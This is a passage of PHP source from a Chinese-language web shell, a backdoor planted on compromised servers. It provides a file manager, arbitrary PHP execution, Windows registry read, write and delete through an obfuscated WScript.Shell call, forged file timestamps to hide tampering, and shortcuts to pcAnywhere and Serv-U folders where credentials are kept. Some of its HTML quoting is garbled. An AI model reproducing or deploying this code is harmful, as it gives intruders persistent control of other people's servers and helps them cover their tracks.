    echo ($a=="0") ? "程序已经成功执行!" : "程序运行失败!";
}
// 查看PHP配置参数状况
elseif(($_POST["do"] == "viewphpvar") AND !empty($_POST["phpvarname"])) {
    echo "配置参数 ".$_POST["phpvarname"]." 检测结果: ".getphpcfg($_POST["phpvarname"])."";
}
// 读取注册表
elseif(($regread) AND !empty($_POST["readregname"])) {
    $shell= &new COM("WSc"."rip"."t.Sh"."ell");
    var_dump(@$shell->RegRead($_POST["readregname"]));
}

// 写入注册表
elseif(($regwrite) AND !empty($_POST["writeregname"]) AND !empty($_POST["regtype"]) AND !empty($_POST["regval"])) {
    $shell= &new COM("W"."Scr"."ipt.S"."hell");
    $a = @$shell->RegWrite($_POST["writeregname"], $_POST["regval"], $_POST["regtype"]);
    echo ($a=="0") ? "写入注册表健值成功!" : "写入 ".$_POST["regname"].", ".$_POST["regval"].", ".$_POST["regtype"]." 失败!";
}
// 删除注册表
elseif(($regdelete) AND !empty($_POST["delregname"])) {
    $shell= &new COM("WS"."cri"."pt.S"."he"."ll");
    $a = @$shell->RegDelete($_POST["delregname"]);
    echo ($a=="0") ? "删除注册表健值成功!" : "删除 ".$_POST["delregname"]." 失败!";
}
else {
    echo "$notice";
    echo "<a href="" href="""?dir=C:/Program%20Files/">Program</a> | <a href="" href="""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere">pcAnywhere</a> | <a href="" href="""?dir=C:/Documents%20and%20Settings/All%20Users/「开始」菜单/程序">开始程序</a> | <a href="" href="""?dir=C:/Documents%20and%20Settings/All%20Users">AllUsers</a> | <a href="" href="""?dir=C:/Program Files/RhinoSoft.com/Serv-U">Serv-U</a> | ";
    for ($i=66;$i<=90;$i++){$drive= chr($i).":";
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title="$drive/" href="" href="""?dir=$drive/">$drive\</a>";}
}

}
echo "</b></p> ";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET["action"]) OR empty($_GET["action"]) OR ($_GET["action"] == "dir")) {
    $tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>文件</b></td>
    <td align="center" nowrap width="16%"><b>创建日期</b></td>
<td align="center" nowrap width="16%"><b>最后修改</b></td>
<td align="center" nowrap width="11%"><b>大小</b></td>
<td align="center" nowrap width="6%"><b>属性</b></td>
<td align="center" nowrap width="24%"><b>操作</b></td>
</tr>
<FORM action="" method="POST">
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = "0";
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="1"){
        if($file!=".." && $file!=".")    {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
            echo "<tr class=".getrowbg()."> ";
            echo " <td style="" style="""padding-left: 5px;"><INPUT type=checkbox value=$file name=dl[]> [<a href="" href="""?dir=".urlencode($dir)."/".urlencode($file).""><font color="#006699">$file</font></a>]</td> ";
            echo " <td align="center" nowrap class="smlfont">$ctime</td> ";
            echo " <td align="center" nowrap class="smlfont">$mtime</td> ";
            echo " <td align="center" nowrap class="smlfont"><a href="" href="""?action=search&dir=".$filepath."">Search</a></td> ";
            echo " <td align="center" nowrap class="smlfont"><a href="" href="""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."">$dirperm</a></td> ";
            echo " <td align="center" nowrap>| <a href="" href="""#" onclick="really("".urlencode($dir)."","".urlencode($file)."","你确定要删除 $file 目录吗? \n\n如果该目录非空,此次操作将会删除该目录下的所有文件!","1")">删除</a> | <a href="" href="""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."">改名</a> |</td> ";
            echo "</tr> ";
            $dir_i++;
        } else {
            if($file=="..") {
                echo "<tr class=".getrowbg()."> ";
                echo " <td nowrap colspan="6" style="" style="""padding-left: 5px;"><a href="" href="""?dir=".urlencode($dir)."/".urlencode($file)."">返回上级目录</a></td> ";
                echo "</tr> ";
            }
        }
    }
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = "0";
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="0"){        
        $size=@filesize($filepath);
        $size=$size/1024 ;
        $size= @number_format($size, 3);
        if (@filectime($filepath) == @filemtime($filepath)) {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
        } else {
            $ctime="<span class="redfont">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
            $mtime="<span class="redfont">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
        }
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
        echo "<tr class=".getrowbg()."> ";
        echo " <td style="" style="""padding-left: 5px;">";
        echo "<INPUT type=checkbox value=$file name=dl[]>";
        echo "<a href="" href="""$filepath" target="_blank">$file</a></td> ";
        echo " <td align="center" nowrap class="smlfont">$ctime</td> ";
        echo " <td align="center" nowrap class="smlfont">$mtime</td> ";
        echo " <td align="right" nowrap class="smlfont"><span class="redfont">$size</span> KB</td> ";
        echo " <td align="center" nowrap class="smlfont"><a href="" href="""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."">$fileperm</a></td> ";
        echo " <td align="center" nowrap><a href="" href="""?downfile=".urlencode($filepath)."">下载</a> | <a href="" href="""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."">编辑</a> | <a href="" href="""#" onclick="really("".urlencode($dir)."","".urlencode($filepath)."","你确定要删除 $file 文件吗?","2")">删除</a> | <a href="" href="""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."">改名</a> | <a href="" href="""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."">时间</a></td> ";
        echo "</tr> ";
        $file_i++;
    }
}// while
@closedir($dirs);
if(get_cfg_var("safemode"))$z = "<a href="" href="""#" title="使用说明" onclick="alert("Php为安全模式尽量少打包内容以免脚本超时\n\n填写文件名则把文件保存在本地方便操作,不填则直接下载。")">(?)</a>";
else $z = "<a href="" href="""#" title="使用说明" onclick="alert("Php运行非安全模式,打包大件请等啊等啊等啊等\n\n填写文件名则把文件保存在本地方便操作,不填则直接下载。")">(?)</a>";
$tb->tdbody("<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>".$tb->makeinput("chkall","on","onclick="CheckAll(this.form)"","checkbox","30","")." 本地文件:".$tb->makeinput("localfile","","","text","15")."".$tb->makeinput("downrar","选中打包下载或本地保存","","submit")." ".$z."</td><td align="right">".$dir_i." 个目录 / ".$file_i." 个文件</td></tr></table>","center",getrowbg(),"","","6");

echo "</FORM> ";
echo "</table> ";
}// end dir

elseif ($_GET["action"] == "editfile") {
    if(empty($newfile)) {
        $filename="$dir/$editfile";
        $fp=@fopen($filename,"r");
        $contents=@fread($fp, filesize($filename));
        @fclose($fp);
        $contents=htmlspecialchars($contents);
    }else{
        $editfile=$newfile;
        $filename = "$dir/$editfile";
    }
    $action = "?dir=".urlencode($dir)."&editfile=".$editfile;
    $tb->tableheader();
    $tb->formheader($action,"新建/编辑文件");
    $tb->tdbody("当前文件: ".$tb->makeinput("editfilename",$filename)." 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert("这个功能只可以用来加密或是压缩完整的php代码。\n\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!")"> ");
    $tb->tdbody($tb->maketextarea("filecontent",$contents));
    $tb->makehidden("do","doeditfile");
    $tb->formfooter("1","30");
}//end editfile

elseif ($_GET["action"] == "rename") {
    $nowfile = (isset($_POST["newname"])) ? $_POST["newname"] : basename($_GET["fname"]);
    $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
    $tb->tableheader();
    $tb->formheader($action,"修改文件名");
    $tb->makehidden("oldname",$dir."/".$nowfile);
    $tb->makehidden("dir",$dir);
    $tb->tdbody("当前文件名: ".basename($nowfile));
    $tb->tdbody("改名为: ".$tb->makeinput("newname"));
    $tb->makehidden("do","rename");
    $tb->formfooter("1","30");
}//end rename

elseif ($_GET["action"] == "eval") {
    $action = "?dir=".urlencode($dir)."";
    $tb->tableheader();
    $tb->formheader("".$action." "target="_blank" ,"执行php脚本");
    $tb->tdbody($tb->maketextarea("phpcode",$contents));
    $tb->formfooter("1","30");

}
elseif ($_GET["action"] == "fileperm") {
    $action = "?dir=".urlencode($dir)."&file=".$file;
    $tb->tableheader();
    $tb->formheader($action,"修改文件属性");
    $tb->tdbody("修改 ".$file." 的属性为: ".$tb->makeinput("fileperm",substr(base_convert(fileperms($dir."/".$file),10,8),-4)));
    $tb->makehidden("file",$file);
    $tb->makehidden("dir",urlencode($dir));
    $tb->makehidden("do","editfileperm");
    $tb->formfooter("1","30");
}//end fileperm

elseif ($_GET["action"] == "newtime") {
    $action = "?dir=".urlencode($dir);
    $cachemonth = array("January"=>1,"February"=>2,"March"=>3,"April"=>4,"May"=>5,"June"=>6,"July"=>7,"August"=>8,"September"=>9,"October"=>10,"November"=>11,"December"=>12);
    $tb->tableheader();
    $tb->formheader($action,"克隆文件最后修改时间");
    $tb->tdbody("修改文件: ".$tb->makeinput("curfile",$file,"readonly")." → 目标文件: ".$tb->makeinput("tarfile","需填完整路径及文件名"),"center","2","30");
    $tb->makehidden("do","domodtime");
    $tb->formfooter("","30");
    $tb->formheader($action,"自定义文件最后修改时间");
    $tb->tdbody("<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>","left");
    $tb->tdbody("当前文件名: ".$file);
    $tb->makehidden("curfile",$file);
    $tb->tdbody("修改为: ".$tb->makeinput("year","1984","","text","4")." 年 ".$tb->makeselect(array("name"=>"month","option"=>$cachemonth,"selected"=>"October"))." 月 ".$tb->makeinput("data","18","","text","2")." 日 ".$tb->makeinput("hour","20","","text","2")." 时 ".$tb->makeinput("minute","00","","text","2")." 分 ".$tb->makeinput("second","00","","text","2")." 秒","center","2","30");
    $tb->makehidden("do","modmytime");
    $tb->formfooter("1","30");
}//end newtime

elseif ($_GET["action"] == "shell") {
    $action = "??action=shell&dir=".urlencode($dir);
    $tb->tableheader();
    $tb->tdheader("WebShell Mode"); <